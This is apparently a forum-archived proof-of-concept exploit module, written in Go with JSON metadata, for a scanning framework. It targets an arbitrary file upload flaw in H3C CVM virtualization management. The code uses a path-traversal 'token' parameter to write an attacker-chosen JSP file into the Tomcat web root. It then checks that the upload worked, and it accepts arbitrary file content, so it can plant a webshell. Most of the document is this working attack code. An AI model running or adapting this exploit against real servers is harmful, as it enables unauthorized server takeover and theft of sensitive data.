 "data": ""
 },
 "ResponseTest": {
 "type": "group",
 "operation": "AND",
 "checks": [
 {
 "type": "item",
 "variable": "$code",
 "operation": "==",
 "value": "200",
 "bz": ""
 },
 {
 "type": "item",
 "variable": "$body",
 "operation": "contains",
 "value": "test",
 "bz": ""
 }
 ]
 },
 "SetVariable": []
}
],
"ExploitSteps": [
"AND",
{
 "Request": {
 "method": "GET",
 "uri": "/test.php",
 "follow_redirect": true,
 "header": {},
 "data_type": "text",
 "data": ""
 },
 "ResponseTest": {
 "type": "group",
 "operation": "AND",
 "checks": [
 {
 "type": "item",
 "variable": "$code",
 "operation": "==",
 "value": "200",
 "bz": ""
 },
 {
 "type": "item",
 "variable": "$body",
 "operation": "contains",
 "value": "test",
 "bz": ""
 }
 ]
 },
 "SetVariable": []
}
],
"Tags": [
"Arbitrary File Creation"
],
"VulType": [
"Arbitrary File Creation"
],
"CVEIDs": [
""
],
"CNNVD": [
""
],
"CNVD": [
""
],
"CVSSScore": "8.0",
"Translation": {
"CN": {
 "Name": "H3C CVM 前台任意文件上传漏洞",
 "Product": "H3C-CVM",
 "Description": "H3C 公司依托其强大的技术实力、产品与服务优势，以及深入人心的以客户为中心的理念，为企业数据中心 IaaS 云计算基础架构提供最优化的虚拟化与云业务运营解决方案。通过 H3C CAS CVM 虚拟化管理系统实现数据中心虚拟化环境的中央管理控制，以简洁的管理界面，统一管理数据中心内所有的物理资源和虚拟资源，不仅能提高管理员的管控能力、简化日常例行工作，更可降低 IT 环境的复杂度和管理成本。 H3C CVM 存在任意文件上传漏洞，攻击者可以上传任意文件，获取 webshell，控制服务器权限，读取敏感信息等。 ",
 "Recommendation": "目前官方尚未发布安全补丁，请关注厂商更新。<a href=\"http://www.h3c.com/cn/Service/Document_Software/Software_Download/H3Cloud/Catalog/Cloud_Virtualization/CAS_CVM/\" target=\"_blank\">http://www.h3c.com/cn/Service/Document_Software/Software_Download/H3Cloud/Catalog/Cloud_Virtualization/CAS_CVM/</a> ",
 "Impact": "H3C CVM 存在任意文件上传漏洞，攻击者可以上传任意文件，获取 webshell，控制服务器权限，读取敏感信息等。 ",
 "VulType": [
 "⽂件上传"
 ],
 "Tags": [
 "⽂件上传"
 ]
},
"EN": {
 "Name": "H3C CVM Arbitrary File Upload Vulnerability",
 "Product": "H3C-CVM",
 "Description": "H3C company relies on its strong technical strength, product and service advantages, as well as the popular customer-centric concept to provide optimized virtualization and cloud business operation solutions for the IAAs cloud computing infrastructure of enterprise data center. Through the H3C CAS CVM virtualization management system, we can realize the central management and control of the virtualized environment in the data center. With a simple management interface, we can uniformly manage all physical and virtual resources in the data center, which can not only improve the management and control ability of administrators, simplify daily routine work, but also reduce the complexity and management cost of the IT environment.H3C-CVM has an arbitrary file upload vulnerability, which allows attackers to upload arbitrary files, obtain webshell, control server permissions, read sensitive information, etc. ",
 "Recommendation": "At present, the official has not released a security patch, please pay attention to the manufacturer's update.<a href=\"http://www.h3c.com/cn/Service/Document_Software/Software_Download/H3Cloud/Catalog/Cloud_Virtualization/CAS_CVM/\" target=\"_blank\">http://www.h3c.com/cn/Service/Document_Software/Software_Download/H3Cloud/Catalog/Cloud_Virtualization/CAS_CVM/</a> ",
 "Impact": "H3C-CVM has an arbitrary file upload vulnerability, which allows attackers to upload arbitrary files, obtain webshell, control server permissions, read sensitive information, etc. ",
 "VulType": [
 "Arbitrary File Creation"
 ],
 "Tags": [
 "Arbitrary File Creation"
 ]
}
},
"AttackSurfaces": {
"Application": null,
"Support": null,
"Service": null,
"System": null,
"Hardware": null
}
}`

exploitUploadFile2398429842 := func(fileName string, fileContent string, host *httpclient.FixUrl) bool {

// 上传文件
requestConfig := httpclient.NewPostRequestConfig("/cas/fileUpload/upload?token=/../../../../../var/lib/tomcat8/webapps/cas/js/lib/buttons/" + fileName + ".jsp&name=222")
requestConfig.VerifyTls = false
requestConfig.FollowRedirect = false
requestConfig.Header.Store("Content-range", "bytes 0-10/20")
requestConfig.Header.Store("Referer", "http://"+host.HostInfo+"/cas/login")
requestConfig.Data = fileContent

if resp, err := httpclient.DoHttpRequest(host, requestConfig); err == nil {
 if resp.StatusCode == 200 && strings.Contains(resp.Utf8Html, "\"success\\\":true") {
 return true
 }
}

return false
}

checkUploadFile12312313810923 := func(fileName string, fileContent string, host *httpclient.FixUrl) bool {

requestConfig := httpclient.NewGetRequestConfig("/" + fileName)
requestConfig.VerifyTls = false
requestConfig.FollowRedirect = false

if resp, err := httpclient.DoHttpRequest(host, requestConfig); err == nil {
 return resp.StatusCode == 200 && strings.Contains(resp.Utf8Html, fileContent)
}

return false
}

ExpManager.AddExploit(NewExploit(
goutils.GetFileName(),
expJson,
func(exp *jsonvul.JsonVul, u *httpclient.FixUrl, ss *scanconfig.SingleScanConfig) bool {

 rand := goutils.RandomHexString(6)
 rand2 := goutils.RandomHexString(6)

 if exploitUploadFile2398429842(rand2, "<%out.print(\""+rand+"\");%>", u) {
 return checkUploadFile12312313810923("/cas/js/lib/buttons/"+rand2+".jsp", rand, u)
 }

 return false
},
func(expResult *jsonvul.ExploitResult, ss *scanconfig.SingleScanConfig) *jsonvul.ExploitResult {

 fileContent := ss.Params["fileContent"].(string)
 fileName := ss.Params["fileName"].(string)

 if exploitUploadFile2398429842(fileName, fileContent, expResult.HostInfo) {

 expResult.Success = true
 expResult.Output = "文件上传已成功，请检查路径：/cas/js/lib/buttons/" + fileName + ".jsp"
 }

 return expResult
},
))
}

页: [1]

DecoyMini 技术交流社区's Archiver

设备漏洞 PoC 整理